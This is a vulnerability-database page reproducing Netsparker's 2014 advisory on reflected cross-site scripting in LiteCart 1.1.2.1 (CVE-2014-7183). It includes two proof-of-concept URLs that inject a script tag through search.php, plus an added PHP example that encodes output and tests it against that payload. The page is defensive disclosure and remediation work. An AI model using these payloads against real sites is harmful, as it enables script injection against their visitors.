LiteCart 1.1.2.1 Cross Site Scripting

Published: 21 Oct 2014 00:00:00. Reported by: Onur YILMAZ. Type: packetstorm. Source: packetstormsecurity.com

LiteCart 1.1.2.1 XSS Vulnerability

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| CVE | CVE-2014-7183 | 22 Oct 2014 14:00 | cve |
| Cvelist | CVE-2014-7183 | 22 Oct 2014 14:00 | cvelist |
| EUVD | EUVD-2014-7060 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2014-7183 | 22 Oct 2014 14:55 | nvd |
| Prion | Cross site scripting | 22 Oct 2014 14:55 | prion |
| securityvulns | LiteCart Security Advisory - Multiple XSS Vulnerabilities - CVE-2014-7183 | 3 Nov 2014 00:00 | securityvulns |
| securityvulns | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 3 Nov 2014 00:00 | securityvulns |

Code
`Information  
-----------  
Advisory by Netsparker.  
Name: Multiple XSS Vulnerabilities in LiteCart  
Affected Software : LiteCart  
Affected Versions: 1.1.2.1 and possibly below  
Vendor Homepage : http://www.litecart.net  
Vulnerability Type : Cross-site Scripting  
Severity : Important  
CVE-ID: CVE-2014-7183  
Netsparker Advisory Reference : NS-14-032  
  
Advisory URL  
------------  
https://www.netsparker.com/xss-vulnerabilities-in-litecart/  
  
Description  
--------------------  
Several cross-site scripting vulnerabilities were discovered in  
LiteCart, an open source project that allows you to create  
e-commerce sites.  
  
Technical Details  
--------------------  
Proof of Concept URLs for XSS in LiteCart:  
  
http://example.com/litecart-1-1-2-1/search.php?query='"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>  
  
http://example.com/litecart-1-1-2-1/search.php?'"--></style></scRipt><scRipt>alert(0x0000B9)</scRipt>  
  
For more information on cross-site scripting vulnerabilities read the  
following article;  
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/.  
  
Advisory Timeline  
--------------------  
23/09/2014 - First Contact  
29/09/2014 - Vendor released fix  
  
Credits & Authors  
--------------------  
These issues have been discovered by Onur Yilmaz while testing  
Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
Netsparker can find and report security issues and vulnerabilities  
such as SQL Injection and Cross-site Scripting (XSS) in all websites  
and web applications regardless of the platform and the technology  
they are built on. Netsparker's unique detection and exploitation  
techniques allow it to be dead accurate in reporting hence it's the  
first and the only False Positive Free web application security  
scanner. For more information on Netsparker visit  
https://www.netsparker.com.  
`
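
The two proof-of-concept URLs in the advisory carry the payload once as the value of `query` and once as the bare query string, which suggests both the parameter value and the request URL were echoed into the page. The following is an added example, not LiteCart's code and not part of the advisory: the page layout and the helpers `h`, `js`, `self_url` and `render_search` are hypothetical, and it shows output encoding per context for both inputs.

```php
<?php
declare(strict_types=1);

// Encode for HTML text and quoted attribute values.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a string literal for an inline <script> block.
function js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Rebuild the page URL from allow-listed parameters instead of echoing
// the raw query string, so unknown parameter names are dropped.
function self_url(array $get, array $allowed): string {
    $keep = [];
    foreach ($allowed as $name) {
        if (isset($get[$name]) && is_string($get[$name])) {
            $keep[$name] = $get[$name];
        }
    }
    return 'search.php' . ($keep ? '?' . http_build_query($keep) : '');
}

// Hypothetical page that reflects the search term in four contexts.
function render_search(array $get): string {
    $q = isset($get['query']) && is_string($get['query']) ? $get['query'] : '';
    return '<link rel="canonical" href="' . h(self_url($get, ['query'])) . "\">\n"
        . '<h1>Results for ' . h($q) . "</h1>\n"
        . '<input name="query" value="' . h($q) . "\">\n"
        . '<script>var q = ' . js($q) . ";</script>\n";
}

// Constructed inputs modelled on the advisory's two proof-of-concept requests.
$payload = '\'"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>';
$cases = [
    'payload in query value' => ['query' => $payload],
    'payload as bare query string' => [$payload => ''],
];
foreach ($cases as $label => $get) {
    $html = render_search($get);
    // The payload's tags must not appear unencoded in the rendered page.
    $ok = stripos($html, '<scRipt>alert') === false
        && strpos($html, '</style>') === false;
    echo $label, ': ', $ok ? 'encoded' : 'REFLECTED RAW', "\n", $html, "\n";
}
```

`JSON_THROW_ON_ERROR` requires PHP 7.3 or later. `h` covers HTML text and quoted attributes only, which is why the inline script value goes through `js` instead.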

Vulners AI Score: 6.7 (Medium risk)
EPSS: 0.00821